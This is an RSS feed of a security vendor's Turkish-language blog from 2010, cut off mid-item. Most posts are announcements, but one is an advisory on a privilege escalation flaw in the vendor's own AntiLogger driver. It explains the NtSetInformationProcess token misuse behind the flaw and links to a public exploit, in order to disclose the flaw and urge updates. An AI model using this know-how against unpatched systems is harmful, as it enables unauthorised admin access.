<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-1109329877337930296</atom:id><lastBuildDate>Thu, 02 Sep 2010 00:41:40 +0000</lastBuildDate><title>Zemana Blog</title><description /><link>http://blog.zemana.com/</link><managingEditor>erkan.arnaudov@zemana.com (Erkan Arnaudov)</managingEditor><generator>Blogger</generator><openSearch:totalResults>114</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/blog_zemana" /><feedburner:info uri="blog_zemana" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-8271391404349778145</guid><pubDate>Tue, 03 Aug 2010 11:20:00 +0000</pubDate><atom:updated>2010-08-03T14:20:52.855+03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">AntiLogger</category><title>Local Privilege Escalation Vulnerability (UPDATE)</title><description>&lt;a href="http://blog.zemana.com/2010/07/zemana-antilogger-antilog32sys-local_28.html"&gt;Burada &lt;/a&gt;bahsettiğimiz açığın , 1.2.9.206 sürümleri içindede (CNET) bazı hatalı driver (AntiLog32.sys 1.5.2.755) sürümünün bulunduğu rapor edildi bu yüzden &lt;a href="http://download.zemana.com/Products/AntiLogger/AntiLogger_1.9.2.208.exe"&gt;v1.9.2.208&lt;/a&gt; sürümüne güncellemeniz önerilir.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-8271391404349778145?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/IPog0wxbxLo/local-privilege-escalation.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><thr:total>2</thr:total><feedburner:origLink>http://blog.zemana.com/2010/08/local-privilege-escalation.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-4368033538207193</guid><pubDate>Wed, 28 Jul 2010 12:10:00 +0000</pubDate><atom:updated>2010-07-29T11:20:11.840+03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Zemana</category><category domain="http://www.blogger.com/atom/ns#">research</category><title>Zemana AntiLogger AntiLog32.sys Local Privilege Escalation Vulnerability</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.exploit-db.com/exploits/14491/" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" bx="true" height="198" src="http://4.bp.blogspot.com/_W_bgBWwE23o/TFAeJ-C-1MI/AAAAAAAAASo/5vPg_Xz1rAo/s640/exploit.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;Sık sık ziyaret ettiğim &lt;a href="http://www.offensive-security.com/"&gt;Offensive Security&lt;/a&gt;'nin &lt;a href="http://www.exploit-db.com/"&gt;Exploits Database&lt;/a&gt; sitesinde, bugün Local Exploitler'ın en üstünde kendi programımıza ait bir &lt;a href="http://www.exploit-db.com/exploits/14491/"&gt;exploit&lt;/a&gt; ile karşılaştım, şimdiye kadar AntiLogger için irili ufaklı bir çok exploit rapor edilmişti ancak bu aralarında en ciddi olanı diyebilirim ve hemen dev team ile irtibata geçtim, onlarda açığı teyid ettiler ancak son sürümü etkilememesi bize rahat bir nefes aldırdı. Eski sürümü kullananların acilen güncelleme yapmaları gerekiyor!&lt;br /&gt;
&lt;br /&gt;
Çünkü bu exploit sayesinde, local hostunuzdaki kısıtlı kulanıcılardan biri admin yetkilerine ulaşabilir, poc'daki kod, komut istemcisini admin yetkileri ile çalıştırıyor. &lt;br /&gt;
&lt;br /&gt;
Açığa sebebiyet veren, AntiLoger'in kernel driver'ında kullanılan bir özellik. Bu özellik, AntiLogger GUI'nin gerektiğinde administratör yetkilerine ulaştırılabilmesine yarıyordu. Ancak bu özellik Vista kernel'inde kaldırıldığı için AntiLogger'dada kullanımından vazgeçilmişti. &lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Process/NtSetInformationProcess.html"&gt;NtSetInformationProcess &lt;/a&gt;API'sine ProcessInformationClass = &lt;strong&gt;ProcessAccessToken&lt;/strong&gt; verilmesi ile kısıtlı haklara çalışmakta olan bir process, admin yetkilerine ulaştırılabiliyordu, Vista kernel değişiklikleri ile beraber token impersonate işlemi sadece process çalıştırılmadan önce yapılabilir hale geldi. &lt;a href="http://www.codeproject.com/KB/vista-security/UAC__The_Definitive_Guide.aspx"&gt;UAC&lt;/a&gt;'in mekanizmasında olduğu gibi.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.exploit-db.com/exploits/14491/" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" bx="true" height="380" src="http://2.bp.blogspot.com/_W_bgBWwE23o/TFAfk1awPfI/AAAAAAAAASw/9QAoXoCacfs/s640/exploit2.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_W_bgBWwE23o/TFAfopPqpEI/AAAAAAAAAS4/A-7T5A5KSug/s1600/exploit3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" bx="true" height="128" src="http://3.bp.blogspot.com/_W_bgBWwE23o/TFAfopPqpEI/AAAAAAAAAS4/A-7T5A5KSug/s640/exploit3.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_W_bgBWwE23o/TFE5nQ-Em6I/AAAAAAAAATA/MiJrLeE8S-I/s1600/token.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" bx="true" height="388" src="http://1.bp.blogspot.com/_W_bgBWwE23o/TFE5nQ-Em6I/AAAAAAAAATA/MiJrLeE8S-I/s640/token.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-4368033538207193?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/vae1XRkTpUs/zemana-antilogger-antilog32sys-local_28.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_W_bgBWwE23o/TFAeJ-C-1MI/AAAAAAAAASo/5vPg_Xz1rAo/s72-c/exploit.png" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://blog.zemana.com/2010/07/zemana-antilogger-antilog32sys-local_28.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-2493137643877463315</guid><pubDate>Fri, 02 Jul 2010 08:30:00 +0000</pubDate><atom:updated>2010-07-02T11:36:54.308+03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">AntiSpam</category><category domain="http://www.blogger.com/atom/ns#">research</category><title>Gmail Spam Filter</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="cssfloat: left; margin-left: 1em; margin-right: 1em; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_W_bgBWwE23o/TC2jnBO2j8I/AAAAAAAAASU/JZaXWbuc4kk/s1600/sshot-1.png" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;/a&gt;&lt;img border="0" height="252" rw="true" src="http://2.bp.blogspot.com/_W_bgBWwE23o/TC2jnBO2j8I/AAAAAAAAASU/JZaXWbuc4kk/s640/sshot-1.png" width="640" /&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Ara sıra üstteki resimde görüldüğü gibi phishing mailler alıyoruz, bunlara, ekibimizdeki birçok kişi kanmasada, pazarlama bölümümüzdeki gibi teknik konulardan uzak departmandaki takım arkadaşlarımız kanabiliyorlar ve onların mail hesabının hack edilmesi bizide etkiliyor. Mesajda kullanılan sosyal mühendislik çok iyi olduğundan bir çok kişinin buna inanması çok yüksek ve bunu, Gmail spam filtresinin aşsağıdaki kodda olduğu gibi basit bir şekilde engelleyebilmesi gerek. &lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_W_bgBWwE23o/TC2ihps0QHI/AAAAAAAAASM/6wBzEQZdn2E/s1600/sshot-2.png" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="170" rw="true" src="http://2.bp.blogspot.com/_W_bgBWwE23o/TC2ihps0QHI/AAAAAAAAASM/6wBzEQZdn2E/s400/sshot-2.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&amp;nbsp; &lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
Gmail Spam filtresinin aslında çok kuvvetli olmasına rağmen, bunun gibi bir durumu engellemesinin altında bir false positive var gibi? &lt;br /&gt;
&lt;br /&gt;
Sizce bu koşulda spam olarak işaretlenmeyecek zararsız bir içerik nasıl olabilir, varsa örneklerinizi bekliyorum.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Hatırlatma:&lt;/strong&gt; Geçenlerde ortaklığımızı &lt;a href="http://blog.zemana.com/2010/05/zemana-commtouch-teknoloji-ortaklg.html"&gt;ilan&lt;/a&gt; ettiğimiz &lt;a href="http://blog.zemana.com/2010/05/zemana-commtouch-teknoloji-ortaklg.html"&gt;Commtouch&lt;/a&gt;, bu ve bundan çok daha sinsice, tabiri caiz ise şeytanın bile aklına gelmeyecek koşulları analiz edip durdurabiliyor.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-2493137643877463315?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/4688gW1CBK8/gmail-spam-filter.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_W_bgBWwE23o/TC2jnBO2j8I/AAAAAAAAASU/JZaXWbuc4kk/s72-c/sshot-1.png" height="72" width="72" /><thr:total>7</thr:total><feedburner:origLink>http://blog.zemana.com/2010/07/gmail-spam-filter.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-9091483861834991379</guid><pubDate>Tue, 29 Jun 2010 11:24:00 +0000</pubDate><atom:updated>2010-06-29T14:31:44.618+03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Zemana</category><title>Online Banking / Browser Security Test</title><description>Bağımımsız malware araştırma grubu MRG, 30 gün sürecek bir test başlattı ve hergün listesindeki tüm güvenlik programlarını, kendilerinin yazdığı bir spyware ile deniyorlar. Eğer spyware başarılı olursa, paypal şifrelerini, güvenlik duvarını aşarak kendi merkezine yolluyor. (Real-time bakılabilmesi için kendi merkezlerinide public etmişler) &lt;br /&gt;
&lt;br /&gt;
30 gün test etmelerindeki amaçta, güvenlik programlarının kendilerini geliştirip (heuristic,behavioral yada signature tabanlı) kaçıncı günde tepki verip durdurabildiğini görmek. Bu testin içine bizide dahil etmişler ve ilk günden beri en iyi sonucu alan biziz, umarız 30 gün boyuncada böyle devam eder.&lt;br /&gt;
&lt;br /&gt;
AntiLogger'in direk olarak Browser koruması odaklı olmadığı halde bu kadar lider güvenlik üreticisinin önüne geçmesi bize çok büyük motivasyon verdi. &lt;br /&gt;
&lt;br /&gt;
Rapora &lt;a href="http://malwareresearchgroup.com/?page_id=2"&gt;buradan&lt;/a&gt; ulaşabilirsiniz.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_W_bgBWwE23o/TCnXl4BEvDI/AAAAAAAAAR0/Sg7LmVt0GsM/s1600/mrg.PNG" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="640" ru="true" src="http://3.bp.blogspot.com/_W_bgBWwE23o/TCnXl4BEvDI/AAAAAAAAAR0/Sg7LmVt0GsM/s640/mrg.PNG" width="608" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_W_bgBWwE23o/TCnXrTsJasI/AAAAAAAAAR8/SWDNxlOGGlg/s1600/MRG2.JPG" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="620" ru="true" src="http://2.bp.blogspot.com/_W_bgBWwE23o/TCnXrTsJasI/AAAAAAAAAR8/SWDNxlOGGlg/s640/MRG2.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-9091483861834991379?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/aUOmrHwXReo/online-banking-browser-security-test.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_W_bgBWwE23o/TCnXl4BEvDI/AAAAAAAAAR0/Sg7LmVt0GsM/s72-c/mrg.PNG" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://blog.zemana.com/2010/06/online-banking-browser-security-test.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-7621095633545308899</guid><pubDate>Tue, 29 Jun 2010 10:02:00 +0000</pubDate><atom:updated>2010-06-29T14:29:48.696+03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Zemana</category><title>Zemana blog erişim problemi</title><description>&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;Son dönemdeki Google ip adresleriyle yaşanan &lt;a href="http://tib.com.tr/dokuman/bb_google_harita_hizmetleri_16haziran2010[1].pdf"&gt;sıkıntıdan&lt;/a&gt; malesef bizde payımızı aldık.&lt;/div&gt;&lt;br /&gt;
&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;Bloğumuzun alan adı üzerimizde olmasına karşın aslında Google'ın (Blogger) sunucularında host ediliyor ve DNS çözümlemesini CNAME ile yapıyorduk ve kullandığımız CNAME ghs.google.com'in şu an için çözümlemesi 74.125.&lt;strong&gt;43&lt;/strong&gt;.121 olarak çıkıyor ve bu Ip adresi Türkiyeden bloklanmış durumda bu yüzden çözümleme işlemini, DNS sistemimize direk A tipi record (74.125.&lt;strong&gt;77&lt;/strong&gt;.121) girerek yaptık ve ilgili Ip şu an için blok edilmediğinden bloğumuz tekrar açıldı. &lt;/div&gt;&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;&amp;nbsp; &lt;/div&gt;&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;Hernekadar sorun şimdilik çözülmüş gibi gözüksede aslında bu geçici ve stabil olmayan bir çözüm çünkü CNAME yerine A record girmiş oluyoruz ve ileride Google ilgili Ip adresinde bir değişiklik yaparsa tekrar sorun yaşarız. Umarız bu zaman zarfında Google Ip adresleri ile olan sorun çözülür çünkü bloğumuzu güvenlik nedeni ile kendi sunucumuzda host etmek istemiyoruz. &lt;/div&gt;&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;&amp;nbsp; &lt;/div&gt;&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;&amp;nbsp; &lt;/div&gt;&lt;div class="separator" style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none; clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_W_bgBWwE23o/TCnEEcR_SfI/AAAAAAAAARs/Mp_oCpJRTyM/s1600/sshot-2.png" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="384" ru="true" src="http://4.bp.blogspot.com/_W_bgBWwE23o/TCnEEcR_SfI/AAAAAAAAARs/Mp_oCpJRTyM/s640/sshot-2.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-7621095633545308899?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/6ol-y5vX800/zemana-blog-erisim-problemi.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_W_bgBWwE23o/TCnEEcR_SfI/AAAAAAAAARs/Mp_oCpJRTyM/s72-c/sshot-2.png" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://blog.zemana.com/2010/06/zemana-blog-erisim-problemi.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-4980608610648093561</guid><pubDate>Thu, 17 Jun 2010 08:08:00 +0000</pubDate><atom:updated>2010-06-17T11:12:13.953+03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Zemana</category><title>Famous Why, Zemana Interview</title><description>&lt;a href="http://2.bp.blogspot.com/_W_bgBWwE23o/TBnVs5ffPnI/AAAAAAAAARc/q3HO611wr0c/s1600/Famous_Interview_FamousWhy_logo3.png" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" qu="true" src="http://2.bp.blogspot.com/_W_bgBWwE23o/TBnVs5ffPnI/AAAAAAAAARc/q3HO611wr0c/s320/Famous_Interview_FamousWhy_logo3.png" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;&lt;a href="http://www.famouswhy.com/"&gt;FamousWhy&lt;/a&gt; &lt;span id="goog_139804186"&gt;&lt;/span&gt;portalı bizi ünlüler listesine aldı ve ufak bir &lt;a href="http://download.famouswhy.com/publisher/zemana_ltd/"&gt;reportaj&lt;/a&gt; verdik. &lt;br /&gt;
Thanks guys :)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none; clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_W_bgBWwE23o/TBnWZbEqqhI/AAAAAAAAARk/Bu7bddkzSoE/s1600/famouswhy.com.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="612" qu="true" src="http://3.bp.blogspot.com/_W_bgBWwE23o/TBnWZbEqqhI/AAAAAAAAARk/Bu7bddkzSoE/s640/famouswhy.com.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-4980608610648093561?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/Dl5P21LgAho/famous-why-zemana-interview.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_W_bgBWwE23o/TBnVs5ffPnI/AAAAAAAAARc/q3HO611wr0c/s72-c/Famous_Interview_FamousWhy_logo3.png" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://blog.zemana.com/2010/06/famous-why-zemana-interview.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-8415663120967619429</guid><pubDate>Wed, 02 Jun 2010 06:55:00 +0000</pubDate><atom:updated>2010-06-02T10:01:03.020+03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Zemana</category><category domain="http://www.blogger.com/atom/ns#">AntiLogger</category><title>AntiLogger - TopTenREVIEWS Video</title><description>Daha önce &lt;a href="http://blog.zemana.com/2010/05/zemana-antilogger-ranked-1-on.html"&gt;bahsetmiş&lt;/a&gt; olduğumuz TopTenREVIEWS, AntiLogger için bir Video yayınladı. &lt;br /&gt;
&lt;br /&gt;
&lt;embed allowfullscreen="true" allowscriptaccess="always" flashvars="&amp;amp;file=http%3A%2F%2Fzemana.com%2FReviewVideo%2FZemana_AntiLogger_Review.flv&amp;amp;image=http%3A%2F%2Fzemana.com%2FReviewVideo%2FZemana_AntiLogger_Review.flv_000022060.jpg&amp;amp;plugins=viral-2d" height="320" src="http://zemana.com/ReviewVideo/player-viral.swf" type="application/x-shockwave-flash" width="470"&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://anti-keylogger-software-review.toptenreviews.com/zemana-antilogger-review.html"&gt;TopTenREVIEWS, &lt;em&gt;"We Do The Research So You Don't Have To"&lt;/em&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/embed&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-8415663120967619429?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/qGmWXmeRFKc/antilogger-toptenreviews-video.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><thr:total>0</thr:total><feedburner:origLink>http://blog.zemana.com/2010/06/antilogger-toptenreviews-video.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-8243924000347219082</guid><pubDate>Wed, 26 May 2010 13:05:00 +0000</pubDate><atom:updated>2010-05-26T17:27:44.102+03:00</atom:updated><title>Zemana - Commtouch Teknoloji Ortaklığı</title><description>&lt;div class="separator" style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none; clear: both; text-align: center;"&gt;&lt;a href="http://www.commtouch.com/security-center" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" gu="true" src="http://1.bp.blogspot.com/_W_bgBWwE23o/S_0byCA9DPI/AAAAAAAAAQ0/mwheM-ExhPA/s320/commtouch-zemana.PNG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;Anti-Spam, Anti-Phishing ve Content Filtering konularında endüstri lideri olan &lt;a href="http://www.commtouch.com/"&gt;Commtouch&lt;/a&gt; ile teknolojik işbirliği gerçekleştirdik. İşbirliği kapsamında, Zemana Internet Security ve Zemana Endpoint Protection, aşşağıdaki Commtouch teknolojilerini kullanacak. &lt;/div&gt;&lt;br /&gt;
&lt;strong&gt;Anti-Spam, Zero-Hour ™&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;Zero-Hour™ Virus Outbreak Protection&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;GlobalView™ URL Filtering &lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;GlobalView™ Anti-Phishing&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;GlobalView™ Zombie Intelligence Service&lt;/strong&gt; &lt;br /&gt;
&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;Belki Commtouch ismini duymayanlarız olabilir ancak kullandığınız AntiVirüsler'den tutunda ISP'nize ,mail servis sağlayıcılarınıza kadar bir çok yerde Commtouch teknolojilerini kullanıyorsunuz. &lt;/div&gt;&lt;br /&gt;
Commtouch teknolojileri ile Anti-Spam ve Content Filtering alt yapısını oluşturan firmalara örnek verirsek; &lt;a href="http://www.3com.com/"&gt;3Com&lt;/a&gt;, &lt;a href="http://www.checkpoint.com/"&gt;Check Point&lt;/a&gt;, &lt;a href="http://www.f-secure.com/"&gt;F-Secure&lt;/a&gt;, &lt;a href="http://www.netgear.com/"&gt;NETGEAR&lt;/a&gt;, &lt;a href="http://www.nexussafe.com/"&gt;Nexus&lt;/a&gt;, &lt;a href="http://www.pandasecurity.com/"&gt;Panda&lt;/a&gt; ,&lt;a href="http://www.watchguard.com/"&gt;WatchGuard&lt;/a&gt;, &lt;a href="http://www.gdata.de/"&gt;G-Data&lt;/a&gt; ve daha bir çok lider yabancı şireketin yanında Türkiyeden bile &lt;a href="http://www.mynet.com/"&gt;MYNET&lt;/a&gt;'i sayabiliriz. &lt;br /&gt;
&lt;br /&gt;
&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;Kısaca, Commtouch 1991'den beri 40 milyonun üzerinde müşterisi ile Internetin Anti-Spam omurgasını oluşturuyor. Zemana iş geliştirme müdürümüz Velislav Daskalov şöyle diyor &lt;em&gt;"Alanında, Commtouch'a rakip olacak başka bir firma olmadığı için kararımızı çok kolay verdik."&lt;/em&gt;&lt;/div&gt;&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;&lt;br /&gt;
Basın bültenini okumak için &lt;a href="http://www.commtouch.com/press-releases/zemana-strengthens-its-internet-security-suite-commtouch-technology"&gt;tıklayınız&lt;/a&gt;. &lt;/div&gt;&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none; clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_W_bgBWwE23o/S_0b9yv7leI/AAAAAAAAAQ8/Wvs8N5wdrkg/s1600/RPD_diagram.gif" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" gu="true" src="http://2.bp.blogspot.com/_W_bgBWwE23o/S_0b9yv7leI/AAAAAAAAAQ8/Wvs8N5wdrkg/s320/RPD_diagram.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none; clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_W_bgBWwE23o/S_0cEA3-5lI/AAAAAAAAARE/-cpIWDqNMgQ/s1600/URLF%2520diagram.png" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" gu="true" src="http://2.bp.blogspot.com/_W_bgBWwE23o/S_0cEA3-5lI/AAAAAAAAARE/-cpIWDqNMgQ/s320/URLF%2520diagram.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-8243924000347219082?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/lHm79m7GE4w/zemana-commtouch-teknoloji-ortaklg.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_W_bgBWwE23o/S_0byCA9DPI/AAAAAAAAAQ0/mwheM-ExhPA/s72-c/commtouch-zemana.PNG" height="72" width="72" /><thr:total>5</thr:total><feedburner:origLink>http://blog.zemana.com/2010/05/zemana-commtouch-teknoloji-ortaklg.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-4371677377515898108</guid><pubDate>Wed, 26 May 2010 10:38:00 +0000</pubDate><atom:updated>2010-05-26T17:27:44.107+03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">AntiLoger</category><title>AntiLogger, banker trojan'a karşı</title><description>&lt;a 